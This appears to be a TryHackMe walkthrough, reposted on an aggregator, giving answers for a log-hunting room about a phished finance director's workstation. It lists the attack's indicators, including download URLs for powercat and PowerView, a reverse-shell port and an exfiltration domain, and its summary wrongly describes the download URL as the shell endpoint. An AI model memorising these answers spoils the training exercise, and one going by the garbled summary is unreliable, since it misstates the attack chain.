avatarTrnty

Summary

The website content outlines a step-by-step walkthrough of the "Hunt Me I: Payment Collectors" challenge on TryHackMe, detailing the process of investigating a security breach where a Finance Director was phished, leading to a series of malicious activities on a workstation.

Abstract

The "Hunt Me I: Payment Collectors" walkthrough on TryHackMe is a comprehensive guide that takes the reader through the forensic analysis of a cyber attack. It begins with the identification of a ZIP attachment, Invoice_AT_2023–227.zip, which was downloaded by an employee named Michael. The extraction of this file led to the execution of a malicious command-line process, powershell.exe, which was used to establish a reverse shell connection to an attacker's URL, https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1, on port 19282. Post-exploitation activities included running systeminfo.exe for system enumeration, downloading powerview.ps1 to enumerate the domain, and mapping a file share named SSF-FinancialRecords. The attacker copied sensitive files to a local directory and prepared an archive named exfilt8me.zip for data exfiltration using the technique identified by the MITRE ID T1048. The exfiltrated data was retrieved by the attacker's server, haz4rdw4re.io. The walkthrough concludes with instructions to reconstruct an additional exfiltrated file using base64 strings from logs to obtain a flag.

Opinions

  • The walkthrough is structured to provide clear, actionable steps for incident response and forensic analysis, suggesting a methodical approach to cybersecurity education.
  • The use of real-world tools like PowerCat and PowerView indicates a focus on practical, hands-on learning experiences.
  • The inclusion of MITRE ATT&CK framework references (e.g., T1048) demonstrates an alignment with industry standards for threat modeling and security best practices.
  • The challenge seems designed to enhance the participant's skills in log analysis, reverse engineering, and understanding of attacker methodologies.
  • The presence of a final task involving the reconstruction of an exfiltrated file suggests an emphasis on the importance of attention to detail and the use of tools like CyberChef in the incident response process.

TryHackMe | Hunt Me I: Payment Collectors Walkthrough

A Finance Director was recently phished. Can you hunt the logs and determine what damage was done?

Link-https://tryhackme.com/room/paymentcollectors

What was the name of the ZIP attachment that Michael downloaded?

Invoice_AT_2023–227.zip

What was the contained file that Michael extracted from the attachment?

Payment_Invoice.pdf.lnk.lnk

What was the name of the command-line process that spawned from the extracted file attachment?

powershell.exe

What URL did the attacker use to download a tool to establish a reverse shell connection?

https: //raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

What port did the workstation connect to the attacker on?

19282

What was the first native Windows binary the attacker ran for system enumeration after obtaining remote access?

systeminfo.exe

What is the URL of the script that the attacker downloads to enumerate the domain?

https: //raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"

What was the name of the file share that the attacker mapped to Michael’s workstation?

SSF-FinancialRecords

What directory did the attacker copy the contents of the file share to?

C:\Users\michael.ascot\downloads\exfiltration

What was the name of the Excel file the attacker extracted from the file share?

ClientPortfolioSummary.xlsx

What was the name of the archive file that the attacker created to prepare for exfiltration?

exfilt8me.zip

What is the MITRE ID of the technique that the attacker used to exfiltrate the data?

T1048

What was the domain of the attacker’s server that retrieved the exfiltrated data?

haz4rdw4re.io

The attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after reconstructing the file?

Get the two parts of the base 64 string from the two logs and decrypt it in cyberchef.

That’s it! See you in the next Room :)

Tryhackme
Investigation
Incident Response
Cybersecurity
Finance
Recommended from ReadMedium
avatarrutbar
TryHackMe — Search Skills | Cyber Security 101 (THM)

Evaluation of Search Results

3 min read
avatarJawstar
CyberChef: The Basics Tryhackme Write up

Tryhackme

4 min read
avatarembossdotar
TryHackMe — Firewall Fundamentals — Writeup

Key points: Firewall | FW | Types | Windows built-in firewall | Linux built-in firewall | Rules. Firewall Fundamentals by awesome…

3 min read
avatarHaircutfish
TryHackMe Room — Summit

This is a subscribers only room on TryHackMe. It was created by TryHackMe. Here it the link to said room, TryHackMe Room — Summit.

14 min read
avatarAxoloth
TryHackMe | Training Impact on Teams | WriteUp

Discover the impact of training on teams and organisations

2 min read
avatarrutbar
TryHackMe — REMnux: Getting Started | Cyber Security 101 (THM)

File Analysis

4 min read